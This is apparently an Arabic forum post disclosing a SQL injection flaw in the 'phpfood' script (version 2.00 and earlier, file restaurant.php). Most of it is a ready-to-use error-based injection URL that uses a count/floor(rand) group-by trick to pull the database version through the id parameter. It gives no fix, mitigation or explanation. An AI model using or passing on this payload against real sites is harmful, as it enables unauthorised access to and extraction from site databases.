ثغرة في سكريت phpfood من نوع SQL INJECTION


ثغرة في سكريت phpfood من نوع SQL INJECTION




الإصدار :
2.00 وجميع الإصدارات السابقة

الملف المصاب :
restaurant.php


إستغلال الثغرة :

كود:
كود:
http://127.0.0.1/[phpfood]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1